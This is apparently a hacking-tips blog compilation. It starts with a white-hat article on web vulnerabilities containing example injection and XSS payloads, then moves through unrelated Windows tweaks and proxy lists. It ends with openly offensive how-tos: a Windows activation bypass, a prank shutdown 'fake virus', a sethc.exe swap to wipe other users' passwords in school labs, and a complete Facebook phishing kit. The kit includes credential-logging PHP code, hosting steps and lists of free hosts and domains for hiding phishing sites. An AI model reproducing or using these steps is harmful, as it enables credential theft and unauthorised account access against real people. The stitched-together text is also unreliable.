Top 5 Ways to Hack into Your Web Application (and how to close those security loopholes!)

 

Are you familiar with white hat hacking? If you aren’t, you should be. White hat hacking is a planned attack that checks your systems for vulnerabilities. After the hacker successfully (and harmlessly) compromises your environment, they tell you what to do to fix it.

Even though most security loopholes are well-documented, I’m surprised how many open exploits are in applications that we security scan here at INetU. So stand by for a little White Hat Hacking 101, where I’ll teach you how to hack into your own site.

Hack One: Injection Attacks

I’ll start with injection exploits because most IT professionals, even though they have cursory basic understanding of the dangers, leave too many sites open to the vulnerability, according to the Open Web Applications Security Project (OWASP). Injection is passing malicious user-supplied data to an interpreter. The most common form is SQL Injection, where the hacker passes a SQL command to your database. Are you at risk? Let’s find out.
Find a page on your application that accepts user-supplied information to access a database:

• A login form, signup form, or “forgot password” form is a good start.
• A dynamic page that uses URL variables such as ID (product information pages are good for this).

Knowing that the database command takes the user-supplied information into a WHERE clause, try to finish the command with SQL that will throw an error. So on our login form, perhaps we want to try putting this into the username: username’ or fake_column IS NULL. If you are greeted with a database error message page, success! You’ve hacked your own site.
The Risk: Our hack above seems pretty harmless, but it just finds the place in your application susceptible to malicious code injection. Once a hacker knows they have an unprotected line to your database, the possibilities are endless: vandalism, data theft, or even total system compromise.
The Fix: There are two main ways to protect your site from injection: 1) always sanitize user-submitted data (if a username can’t contain a single quote character, don’t let users enter it), and 2) use a web-specific database login that has the least permissions necessary to perform its tasks (your web application doesn’t need admin access to your database). OWASP has a SQL Injection Prevention Cheat Sheet that is also particularly helpful.

Hack Two: PHP Remote File Includes

If your site doesn’t use any PHP, then good news: you’re safe! But according to the SANS Institute, PHP is the most popular web application framework. When used properly, PHP can be a very powerful and useful tool for a number of different applications. Perhaps because of its popularity, it’s also an enticing target for hackers to find exploits. The PHP function allow_url_fopen is a favorite for hackers not only because it allows them to run their scripts on your site, but also because it is enabled by default.
Are you at risk? Let’s find out.
Find a PHP script that uses the include() function. If you have a path name in the include, change it to the absolute URL equivalent. If the file still works after this change, success! You’ve just hacked your own site.
The Risk: Okay, the hacker might need to do a little more legwork in this example, but it severely increases the surface area for attack. All a hacker needs to do is find one file to manipulate and add the line: include(‘http://www.example.com/malicious_code.php’) and you are compromised. Compromise might include password stealing, remote root kit installation, and in some cases complete system compromise.
The Fix: Turning off allow_url_fopen is the most obvious fix, but if that isn’t an option, you can try turning on PHP’s safe mode to prevent the most common malicious functions from executing on your server. Keep PHP updated with the latest security patches and be aware of emerging threats by following tech news outlets.

Hack Three: Cross Site Scripting (XSS)

Cross Site Scripting occurs when a website takes malicious user input and, without question, posts the input to their page. The most common reason for a web application to do this is capturing user feedback: product reviews, blog comments, etc. As today’s Internet user can open discussions and interact with more websites, XSS hacks are becoming an ever-prevalent problem, possibly soon to be the most common vulnerability on the Internet.
So are you at risk? Let’s find out.
Search your application for a page that takes user input and outputs it directly to a webpage. Common examples:

• Forums
• Comments
• Wikis
• Reviews

Craft a post that calls on JavaScript from an outside server. For example, try to post: This is a hacked entry <script src=”http://www.example.com/malicious.js”></script>. Now load the page where that post is outputted. Did your script run? Then success! You’ve just hacked your own site.
The Risk: The risk here is both for you and for your visitors. First, this opens your visitors to worms infected through the linked malicious code. Second, your site can be defaced with code that manipulates how your page displays. Third, your hijacked site can be flagged by Google and other search engines as a malicious site, and it could take you months to regain your page rank status. Lastly, it opens the next vulnerability: Cross Site Request Forgeries (CSRF).
The Fix: Fixing XSS and CSRF vulnerabilities require the same steps, so read below.

Hack Four: Cross Site Request Forgeries (CSRF)

In a CSRF attack, a hacker uses a cross-site script to hijack a logged-in user’s credentials. If you are at risk for XSS, then you might be at risk for a CSRF attack. Are you? Let’s find out.
Does your application rely on credentials, like session cookies, to grant permissions to users on your site? If you don’t know offhand, try taking a look at the cookies your browser is storing when you login to your application. Even easier, if your site has a “remember me” feature for logging in, and you know from above you are vulnerable for XSS attacks, then success! You’ve just hacked your own site.
The Risk: The most common use of CSRF is to propagate the virus. The Samy MySpace Worm is a good example. Most security-aware users don’t trust random messages from profiles that look “spammy” and therefore don’t open themselves to catching an XSS worm. However, if that user has a friend who has been compromised, a CSRF attack can send a message as the trusted friend with the infected message, tricking the user to become infected. There are additional risks if the infected user has “moderator” or “admin” privileges to the site because the hacker automatically gains those permissions, which could end with entire site compromise.
The Fix: Never trust user-supplied input. Erase any JavaScript supplied by the user, or for that matter, any encoded information. Or limit the user’s ability to a strict set of tags (bold and italic, for example) and remove modifiers to those tags on output. For more information OWASP has a comprehensive guide to protection against XSS attacks.

Hack Five: Insecure Communications

Perhaps one of the oldest tricks in the book, site operators and visitors often forget that everything transmitted across an insecure protocol—including FTP and HTTP—is plaintext, meaning that usernames, passwords, private messages, or even credit card information is ripe for the taking for a hacker with the proper tools. A “man-in-the-middle” attack occurs when a malicious user “sniffs” the packets sent between source and destination.
Are you at risk? Let’s find out.
Navigate to a page on your site where you fill out a form, or when user information is displayed to the site visitor. Is this happening through HTTPS? (Your browser should indicate a lock icon or a green location bar). If not, that information can be intercepted. Don’t forget FTP. Are your login credentials for an unsecured FTP port the same as for your database or other secured systems? Do you upload or download sensitive files through unsecured FTP? Success! You’ve just hacked your own site.
The Risk: This depends on what information a hacker is able to recover. The most basic security breach could be a simple invasion of privacy, but could also result in identity theft, leaking of confidential documents, or the compromise of admin passwords leading to full site compromise.
The Fix: The use of SSL certificates is the most common fix for web-based communication. SSL encrypts data before transmission and decrypts on arrival. The “man-in-the-middle” is left with (nearly) undecipherable encrypted data. Other technologies exist that can achieve the same end depending on the means of transportation. SSL isn’t a cure-all, however. Make sure to limit the private data you request from users, or subsequently transmit back to them. For example, when displaying the credit card number on file to a user, only display the last four digits, with asterisk marks replacing the remaining numbers.

How to Access Multiple Gmail accounts in Firefox without logout?

Are you having multiple Gmail accounts? As far as browsers concerned , we can Login with only one Gmail account. Here i am going to introduce a new Mozilla add on. This add on will allow you to Login in multiple account without Logout the accounts.

How to do?

visit:

https://addons.mozilla.org/firefox/addon/748

and Install the Add on.

Now visit:

http://userscripts.org/scripts/show/16341

click on “Install” button located at the top right side.


Now you can access multiple gmail accounts. You can see the drop down box at the top right side.

Change the user as your wish without logout.

Enjoy !

How to show SuperHidden files in xp and vista?

Some files will be hidden from Users. If you want to see those files,you have to edit the registry. This hack will fit for both windows xp and Vista.

Go to Start-<run
Enter as Regedit
Navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

In the right panel ,you can see the superhidden registry
Right click on the SuperHidden
Change the Data value to 1.
Click ok
Exit the registry and restart the windows.

How to block or Disable Autorun.inf file in windows xp,Windows 7 -Registry Edit

Depending on the version of Windows that you are using, there are different updates that you must have installed to correctly disable the Auto-run functionality:
To disable the Auto-run functionality in Windows XP, in Windows Server 2003, or in Windows 2000, you must have security update 950582, update 967715, or update 953252 installed.



Simple way to disable autorun.inf :
Follow this link and download the msi file:

http://go.microsoft.com/?linkid=9741395

Fix it yourself-Manually disabling the autorun feature:
To disable Autorun yourself on operating systems that do not include Gpedit.msc, follow these steps:
Click Start, click Run, type regedit in the Open box, and then click OK.
Locate and then click the following entry in the registry:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrive

TypeAutorun
Right-click NoDriveTypeAutoRun, and then click Modify.
In the Value data box, type 0xFF to disable all types of drives. Or, to selectively disable specific drives, use a different value as described in the "How to selectively disable specific Autorun features" section.
Click OK, and then exit Registry Editor.
Restart the computer.

you can re-enable the autorun feature :
Follow this link:

http://go.microsoft.com/?linkid=9743275

Actually i get this information from here:

http://support.microsoft.com/kb/967715

if you want more information  or want to disable in vista, just visit the above link:

Use Windows 7 without Activation

Windows 7 is gaining more popularity due to its golden features and gadgets, However you should activate your account to use win7 more than 30 days of trial period. But as i think you all know about "slmgr -rearm" command which incresecs the trial period from 30 days to 120 days.



The hack(trick) shown here may be small but by using this hack you can use win7 for approx one year without activation. So lets see the process..

Step-1: Go to Start ►All Programs ►Accessories, Now right click on commnd prompt and select "Run as administrator"
Step-2: Now enter the command given below

 slmgr -rearm

Now you will be promoted for a restart, so make a restart. Once you have been restarted your trial period will reset to 30 days again. You can use this commend for 3 times, so that you will get 120 days of trial period(30+30+30+30=120)
Step-3: Now here comes the real game, just navigate to Start ►Run and type "regedit". So that you will be navigated to Registry Editor.
Once you are once again navigate to the location given below

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform

Step-4: Once you navigate you'll see a key called "skipRearm" on the right side of panel, Just change its value to "1"
That's it, by doing this trick you will be able to use the command "slmgr -rearm" another 8 times so that you will be able to get another 240 days of trial period which you can use with out activation.
By the whole thing you able to get 120+240=360 days of trial period.

Windows 7 Tips, Tricks and Secrets.

Windows 7 seven users are increasing day by day and it gives you some much of fun exploring the tips, tricks and hidden secrets in windows 7. In this post we had given some of our user suggested tips, tricks and secrets, lets fly around them!!!

 


PSR(Problem Steps Recorder):
Window 7 has a great inbuilt future called "PSR - Problem Steps Recorder" which help you to record problems caused by any program installed in you PC. As a PC guru you are followed by your friends and relatives or by others to make you to solve the irritating small PC software problems ;-( I know you are very frustrated by this because they even don't know how to describe their actual problem.
But Microsoft knew your pain, So they had came up with a good solution(PSR) by which you can ask your friend/relative/others to run this and send the generated report, So that you can solve their problem with ease.
Now lets see how to work with it, Just follow this simple steps.
Step #1: Click on "Start" and type "PSR" and press enter.Now press "Record"
Step #2: Now run the misbehaving application so that PSR records every thing like every click and key-press, take screen grabs, and package everything up into a single zipped MHTML file.
That's it you are all set to go and solve the problem.

Start Up Repair:
One time or other every body faces this start up problem for a reason or for no-reason, So its good to create a system repair disc straight away in case you run into problems booting the OS later on. Just follow this simple steps.
Step #1: Click Start > Maintenance > Create a System Repair Disc
Step #2: Now let windows 7 create a Emergency boot disk.
If you get to worst case this disk will help you to boot.

Find out Hidden wallpapers and themes:
We all knew that while windows 7 is been installed it will ask for your country, Time Zone etc.., Now based on your responses windows 7 will automatically selects which wallpapers to install by default.
Suppose you had selected your country as India, So that windows seven will install some wallpapers which are related to India.
To unlock all the wallpapers just follow this simple steps.
Step #1: Click on Start and type "C:\Windows\Globalization\MCT" in the search box.
Step #2: Now a window will open with some sub-folders "MCT-AU, MCT-CA, MCT-GB, MCT-US, and MCT-ZA" in which you can select your hidden wallpapers
Here AU, CA, GB, US, and ZA refers to  Australia, Canada, Great Britain, United States and South Africa.

Import file over a network to Windows Live MovieMaker:
In windows 7 by default Windows Live MovieMaker will not give you access to import files over a network, but a simple Registry tweak will make this happen. Just follow this steps.
Step #1: Run REGEDIT
Step #2: Now navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows Live\Movie Maker,
Step #3: Now add a DWORD value called AllowNetworkFiles and set it to 1 to add network support.
That's it your done.

Custom Power Switch:
By default you see the "ShutDown" button on start button. But you are the man who reboots your pc several times a day then you can change "ShutDown" to "ReStart" in a few click by fallowing this simple steps.
Step #1: Right - Click on Start button.
Step #2: Choose Properties and set the 'Power boot action' to 'Restart' to make it happen.
That's it your done!!

Best Windows 8 Shortcuts key

Windows logo key+spacebar Switch input language and keyboard layout
Windows logo key+O Locks device orientation
Windows logo key+Y Temporarily peeks at the desktop
Windows logo key+V Cycles through toasts
Windows logo key+Shift+V Cycles through toasts in reverse order
Windows logo key+Enter Launches Narrator
Windows logo key+PgUp Moves Metro style apps to the monitor on the left
Windows logo key+PgDown Moves Metro style apps to the monitor on the right
Windows logo key+Shift+. Moves the gutter to the left (snaps an application)
Windows logo key+. Moves the gutter to the right (snaps an application)
Windows logo key+C Opens Charms bar
Windows logo key+I Opens Settings charm
Windows logo key+K Opens Connect charm
Windows logo key+H Opens Share charm
Windows logo key+Q Opens Search pane
Windows logo key+W Opens Settings Search app
Windows logo key+F Opens File Search app
Windows logo key+Tab Cycles through Metro style apps
Windows logo key+Shift+Tab Cycles through Metro style apps in reverse order
Windows logo key+Ctrl+Tab Cycles through Metro style apps and snaps them as they are cycled
Windows logo key+Z Opens App Bar

List of some Google Syntax for search

Calculator:
The next time you need to do a quick calculation, instead of bringing up the Calculator applet, you can just type your expression in to Google.
Example:
48512 * 1.02
Word Definitions:
If you need to quickly look up the definition of a word or phrase, simply use the “define:” command.
Example:
define:internet
intitle:
This Syntax restricts your search to the titles of web pages. The variation allintitle: finds pages wherein all the words specified appear in the title of the web page. Using allintitle: is basically the same as using the intitle: before each keyword.
examples:
intitle:”george bush”
allintitle:”money supply” economics
You may wish to avoid the allintitle: variation, because it doesn’t mix well with some of the other syntax elements.
intext:
This Syntax searches only body text (i.e., ignores link text, URLs, and titles). While its uses are limited, it’s perfect for finding query words that might be too common in URLs or link titles.
examples:
Intext:” hackingmore.blogspot.com/”
Intext:html
There’s also an allintext: variation, but again, this doesn’t play well with others.
inanchor:
This Syntax searches for text in a page’s link anchors. A link anchor is the descriptive text of a link. For example, the link anchor in the HTML code
example:
inanchor:” hackingmore.blogspot.com/″
As with other in*: syntax elements, there’s an allinanchor: variation, which works in a similar way (i.e., all the keywords specified must appear in a page’s link anchors).
Link:
Lets you see which pages are linking to your Web page or to another page you’re interested in.
example:
link:http://hackingmore.blogspot.com/
site:
This Syntax allows you to narrow your search by either a site or a top-level domain.
examples:
site: hackingmore.blogspot.com
site:edu
site:nc.us
inurl:
restricts your search to the URLs of web pages. This syntax tends to work well for finding search and help pages, because they tend to be rather regular in composition.
example:
inurl:help
You’ll see that using the inurl: query instead of the site: query has one immediate advantage you can use it to search subdirectories. While the http:// prefix in a URL is ignored by Google when used with site:, search results come up short when including it in an inurl: query. Be sure to remove prefixes in any inurl: query for the best (read: any) results.
You can also use inurl: in combination with the site: syntax to draw out information on subdomains. For example, how many subdomains does google.com really have? A quick query will help you figure that out:
example:
site:google.com -inurl:www.google.com
This query asks Google to list all pages from the google.com domain, but leave out those pages which are from the common subdomain www, since you already know about that one
Do you ever wonder how many subdomains google has.I wondered!!!!
cache:
cache: finds a copy of the page that Google indexed even if that page is no longer available at its original URL or has since changed its content completely.
example:
cache:hackingmore.blogspot.com
If Google returns a result that appears to have little to do with your query, you’re almost sure to find what you’re looking for in the latest cached version of the page at Google. The Google cache is particularly useful for retrieving a previous version of a page that changes often.
filetype:
filetype: searches the suffixes or filename extensions. These are usually, but not necessarily, different file types; filetype:htm and filetype:html will give you different result counts, even though they’re the same file type. You can even search for different page generators—such as ASP, PHP, CGI, and so forth—presuming the site isn’t hiding them behind redirection and proxying. Google indexes several different Microsoft formats, including PowerPoint (.ppt), Excel (.xls), and Word (.doc).
examples:
“learn java” filetype:pdf
“IT books” filetype:doc
related:
related:, as you might expect, finds pages that are related to the specified page. This is a good way to find categories of pages; a search for related:google.com returns a variety of search engines, including Lycos, Yahoo!, and Northern Light.
examples:
related:www.yahoo.com
related:www.cnn.com
While an increasingly rare occurrence, you’ll find that not all pages are related to other pages.
info:
info: provides a page of links to more information about a specified URL. This information includes a link to the URL’s cache, a list of pages that link to the URL, pages that are related to the URL, and pages that contain the URL.
examples:
info:www.hackingmore.blogspot.com
info:www.nytimes.com/technology
Note that this information is dependent on whether Google has indexed the specified URL; if not information will obviously be far more limited.
phonebook:
This Syntex as you might expect, looks up phone numbers.
examples:
phonebook:James Bond
phonebook:(511) 556-2725
Source: Google features

How To: Have Custom log-on Screen in Windows 7

Log-on Screen is the screen that is presented to you when you login to your computer(start it). It is really cool to have your picture or any custom picture there to impress your friends!

Tutorial:

=======

Step 1: Press "Start" and type "regidit" in "search programme and files"

Step 2: Navigate to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Authentication\Logo​nUI\Background 

Step 3: Double-click the DWORD key called OEMBackground and set the value to "1"

NOTE: if you can't see the DWORD key, just create a new one and name it as "OEMBackgrounds" and set the value to "1"

Step 4: Now put your desired photo to this folder " %windir%\system32\oobe\info\backgrounds " but keep in mind the picture should br less then 256 kb and the dimensions should be same as older picture present there.

Step 5: Now just reboot your computer and you will have the Picture :)

Hope you liked it!

How to Secure your Private Folders

Do you have any private stuff that you would to hide from your friends and relatives? Would you want it to be Invisible so that it remains unnoticed by the normal users? But there are software which can display all the folders that are present on the Disk. So What if you can even  password protect your folder? I guess having your private folder password protected as well as invisible should be secure enough. But you might think that you may need to have a software for that. Well here is a way to do that without using any additional software and you can show off in front of your friends by making their folders invisible as well as password protected. Here is is step by step procedure to create a password protected folder.

How to create a Password Protected Folder

1. Create a new folder (Right-click -> New -> Folder) and give it any name of your choice. For instance I name it as ABC.

2. Now in this folder place all the important files, documents or any folders that you want to password protect.

3. Now Right-click on this folder (ABC) and select the option Send To -> Compressed (zipped) Folder.

4. Now a new compressed zipped folder gets created next this folder (ABC) with the same name.

5. Double-click on this compressed zipped folder and you should see your original folder (ABC) here.

6. Now goto the File menu and select the option Add a password.

ie: File -> Add a password

Now a small window will pop up and here you can set your desired password. Once the password is set, the folder will ask for the password every time it is opened. Thus you have now created the password protected folder.

How to make it Invisible

1. Now Right-click on this password protected folder and select Properties.

2. At the bottom select the option Hidden and press OK. Now your folder gets invisible (hidden).

3. In order to unhide this folder go to My Computer – >Tools -> Folder options. Switch to View tab, scroll down and under Hidden files and folders you’ll see the following two options

Do not show hidden files and folders

Show hidden files and folders

Now select the second option and press OK. Now the invisible folder becomes visible in it’s location. To access it you need the password. To make it invisible again repeat step -1 through step-3 and select the first option and click OK. Now the folder becomes invisible once again.

Lock Your Computer with Easy Shortcut

Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver.

Here the steps to create a shortcut on your desktop to lock your computer:

• Right-click the desktop. Point to New, and then click Shortcut.
• The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation
• Click Next. Enter a name for the shortcut. You can call it “Lock Workstation” or choose any name you like.
• Click Finish.

SIMPLE WAY: The less complicated way to do is to hold windows key+L

Insert your friends picture in Facebook Chat.

Recently I was informed by my very good friend of this great tricks in which you can add the picture of literrily anyone in the Facebook chat. First the trick only had :putnam: which would show a small face, but now there is something more cool in town ;)

TUTORIAL:

Step 1: Goto the Profile of the User or Page whose picture, you want to add.

Step 2: Copy the Username or Profile ID from the page. Ex: http://www.facebook.com/hackingmore or http://www.facebook.com/profile.php?id=0000000000

Step 3: Now Goto the Chat and paste this username or profile ID inside square Brackets Ex: [[hackingmore]]


Step 4: Now press Enter and the Profile picture of that user or page will go to other person.

How to make a fake virus in 1 minute

1: Right-Click on Desktop and choose new and then shortcut.

2: Type in it shutdown -s -t 10 -c "Warning!!! Your Computer is Invaded and it will format for ever.” 

3: Now complete the Shortcut and Customize it’s Icon by right clicking it , than choosing My computer logo for it.

4: Now rename it as My computer and replace it with My computer on Desktop.

5: Enjoy watching your friend dead with fear!! Hahaha.

How does it Work?

There is nothing to be scared of from it because it only shutdown the computer and have n effect on system

Hack any Account Password in XP with Guest account.

Last time I show you how to hack the any account with

Administrator account but that have some limitations especially when you are in school or college where the full administrative rights are not give to your Limited Account the following Hack will 100% hack any account if you can get access to it’s Guest or Limited Account.

Step 1: Open C:\Windows\System32\

Step 2: Now rename sethc.exe to ss.exe (for back up).

Step 3: Now Copy cmd.exe and paste it on Desktop.


Step 4: Now rename the cmd.exe copy on Desktop to sethc.exe and paste it in C:\Windows\System32

Step 5: Now restart the computer and on Log on screen, where it ask you password, press Shift button as fast as possible and a command prompt will appear.


Step 6: Type “net user (account’s name to hack) *” and enter 2 time to remove the password.


Step 7: Make an excuse to tell your computer Lab teacher that how Password was automatically deleted. LOL

Use Gmail Storage Space as Hard Drive

Here I have some great little utilities (3 softwares and 2 web scripts) that you can try to use your Gmail account space as your external hard drive. You will be able to download (or should I say copy) attachments from your Gmail account to your computer just as you would do from a drive on your computer. You can also use this space to upload content direct from your computer and save it online in your Gmail account.

1. GMail Drive

GMail Drive is third party addon for Windows that lets you use your Gmail account space as an extra drive on your computer. It allows a user to access a virtual drive stored in a Gmail e-mail account by causing the contents of the Gmail account to appear as a new network share on the user’s workstation. In order to use this add-on, the user needs a Gmail e-mail account. The add-on enables the user to use the standard Windows desktop file copy and paste commands to transfer files to and from the Gmail account as if it was a drive on the user’s computer.


Download GMail Drive (http://www.viksoe.dk/code/gmail.htm )

2. GSpace

GSpace is a firefox extension that turns your 3GB of your Gmail account into free online storage. With Gspace you can manage unlimited Gmail accounts to store all type of files within its simple, user friendly interface. You can also listen your favourite stored music directly from your Gspace, view your collections of pictures and manage your Gdrive files as well.


Download GSpace (http://www.getgspace.com/download.html )


3. GmailFS


GmailFS or Gmail File System is a virtual file system developed by Richard Jones which allows users to mount and use their Gmail email account’s storage as a local disk drive. GmailFS is written for Linux, but Windows and Mac OS X ports do exist. Using GmailFS will provide the user with roughly three gigabytes of online storage. The speed of this filesystem is limited by the speed of the user’s Internet connection, and the upload/download speed of the Gmail server. Files can be any size, and are stored as (segmented) attachments.

Download GmailFS (http://richard.jones.name/google-hacks/gmail-filesystem/gmail-filesystem.html )

4. G-Share

G-Share is a PHP script that allows you to share your gmail attachments in a webpage, it is a download center with files stored in your Gmail account. You need a MySQL database to store data such as download counters, visitors, etc


Download G-Share (http://sourceforge.net/projects/g-share/)


5. PHP Gmail Drive

PhpGmailDrive, also known as PGD, is an open source software program written in PHP to share Gmail file attachments on the web. PGD is based on GmailFS, a Gmail attachment file system that uses email subjects for organization.

Download PGD (http://pgd.sourceforge.net/)

Tip to speed up the Start Menu in Windows XP

Did you know you can customize the speed of the Start Menu by editing a Registry Key?

1) Click Start, and then click Run.

2) Type Regedit in the box, and then click OK.

3) Expand the menu in the left panel and select the HKEY_CURRENT_USER\Control Panel\Desktop folder.

4) Scroll down in the right panel and double click on the MenuShowDelay file.

5) In the Value Data box, change to default value for the menu speed from 400 to a lesser number, such as 1.

1) Click OK.

List of some Proxy Sites

Here is a list of Some proxy sites from my Incredible List of 350+ Proxy Sites which let you surf any web site. If you want that incredible list just write a comment to this article and I ll Email you that List.


http://proxiesrus.com
http://www.surfindark.com
http://www.navydog.com
http://falsario.com
http://www.cheekyproxy.com
http://www.funkyproxy.com
http://www.surfsneaker.com
http://www.proxii.com
http://www.proxynumber1.com (Replace 1 with any number between 1 to 10) http://myspaceproxyy.com
http://tenpass.com
http://www.browsesneaky.com
http://www.proogle.info http://greatproxy.info
http://www.playnsurf.info
http://www.realproxy.info
http://aplusproxy.com
http://www.ecoproxy.com
http://freedom.webtuo.com
http://www.proxyz.us
http://www.sneakschool.com
http://www.iphide.com
http://www.slyuser.com/
http://pawxy.com
http://pawxy.org
http://browseanywhere.info
http://www.404surf.com
http://www.cloakip.net
http://aniscartujo.com/webproxy
http://www.browsedark.com
http://www.dartprox.com
http://www.proxish.com
http://www.surfsneak.com
http://www.surfsneaky.com
http://www.browsehidden.com
http://www.filterhide.com
http://www.browsesneak.com
http://www.eggproxy.com
http://www.theschoolcloak.com
http://www.badboysproxy.com
http://www.surfscreened.com
http://www.hidemefast.com
http://urlbrowse.com
http://www.hideipaddress.net
http://www.sneakfilter.com
http://www.browsestealth.com
http://www.sneak1.info
http://underproxy.com
http://www.proxypit.com
http://www.proxypan.com
http://myspacewebproxy.org/
http://www.proxyzip.org
http://www.hagiomusic.info
http://www.greenpips.info
http://www.allfreehere.info
http://www.takefreely.info
http://logu.in
http://autobypass.com
http://www.proxcity.info

How to see Hidden Content of Websites?

It is Quite simple. You just need to change your browser’s User Agent. To change your Browser’s User Agent follow the steps given below:

Copy the following code segment into a notepad file and save it as Useragent.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]

@=”Googlebot/2.1″

“Compatible”=”+http://www.googlebot.com/bot.html”

Now Double-Click on the file Useragent.reg to merge the registry file into your Windows Registry.

Now Restart your computer. This is required to apply the changes made into the Registry.

Voila! You’re done! Now you have become GoogleBot.

Top 10 Windows Hacking Tools

This is the Collection of Best Windows Hacking Tools:

1. Cain & Abel – Cain & Abel is a password recovery tool for the Microsoft Windows Operating System. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

2. SuperScan – SuperScan is a powerful TCP port scanner, pinger, resolver. SuperScan 4 (Current Version) is a completely-rewritten update of the highly popular Windows port scanning tool, SuperScan.

3. GFI LANguard Network Security Scanner – GFI LANguard N.S.S. is a network vulnerability management solution that scans your network and performs over 15,000 vulnerability assessments. It identifies all possible security threats and provides you with tools to patch and secure your network. GFI LANguard N.S.S. was voted Favorite Commercial Security Tool by NMAP users for 2 years running and has been sold over 200,000 times!

4. Retina – Retina Network Security Scanner, recognised as the industry standard for vulnerability assessment, identifies known security vulnerabilities and assists in prioritising threats for remediation. Featuring fast, accurate, and non-intrusive scanning, users are able to secure their networks against even the most recent of discovered vulnerabilities.

5. SamSpade – SamSpade provides a consistent GUI and implementation for many handy network query tasks. It was designed with tracking down spammers in mind, but can be useful for many other network exploration, administration, and security tasks. It includes tools such as ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search, and more.

6. N-Stealth – N-Stealth is a commercial web server security scanner. It is generally updated more frequently than free web scanners such as whisker and nikto, but you have to pay for the privilege.

7. Solarwinds – Solarwinds contains many network monitoring, discovery and attack tools. The advanced security tools not only test internet security with the SNMP Brute Force Attack and Dictionary Attack utilities but also validate the security on Cisco Routers with the Router Security Check. The Remote TCP Reset remotely display all active sessions on a device and the Password Decryption can decrypt Type 7 Cisco Passwords. The Port Scanner allows testing for open TCP ports across IP Address and port ranges or selection of specific machines and ports.

8. Achilles – The first publicly released general-purpose web application security assessment tool. Achilles acts as a HTTP/HTTPS proxy that allows a user to intercept, log, and modify web traffic on the fly. Due to a cyber squatter, Achilles is no longer online at its original home of www.Digizen-Security.com…OOPS!

9. CookieDigger - CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values.

10. Netcat (The Network SwissArmy Knife) – Netcat was originally a Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

Hacking Facebook account with Phishing !!!!

The way s the easiest and most commonly use way of hacking a Facbook account.

Step1: Goto www.facebook.com/login.php
Step2 : Save the file to your desktop with photos with name login.php
Step3 : Open the html file with notepad.
Step4 : Now search for form method="POST" and replace it with form method="GET"
Step5 : And next is replacing action="https://login.facebook.com/login.php?login_attempt=1" with action="lol.php"
Step6 : now open a notepad and type following as it is.




<?php
header ('Location: http://www.facebook.com');
$handle = fopen("lol.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>




NOW save this as hello.php

Step7 : now make a account on t35.com and Upload

Login.html
hello.php
lol.txt

A Large List of Free PHP Hosting for Phishing.

* 110mb - http://110mb.com/

* Ripway - http://ripway.com/

* SuperFreeHost - http://superfreehost.info/

* Freehostia - http://freehostia.com/

* Funpic - http://funpic.de/

* Freeweb7 - http://freeweb7.com/

* t35 - http://t35.com/

* Awardspace - http://awardspace.com/

* PHPNet - http://phpnet.us/

* Free Web Hosting Pro - http://freewebhostingpro.com/

* ProHosts - http://prohosts.org/

* AtSpace - http://prohosts.org/

* ByetHost - http://byethost.com/

* 000webhost - http://000webhost.com/

* My5GB - http://www.my5gb.com/

* Oxyhost - http://www.oxyhost.com/

* Rack111 - http://www.rack111.com/

* Ocostwebhost - http://0costwebhost.com/

* FreeZoka - http://www.freezoka.com/

Free Domain List for Hiding your Phishing Site.

* .TK - www.dot.tk

* .CJB.NET - www.cjb.net

* .DOM.IR - www.dom.ir

* .EURO.ST & MANY MORE - www.ulimit.com

* .CO.CC - www.co.cc

* .CO.NR - www.freedomain.co.nr

* .US.TT & MANY MORE - www.joynic.com

* .UNI.CC - www.uni.cc

* .CA.GS - www.ca.gs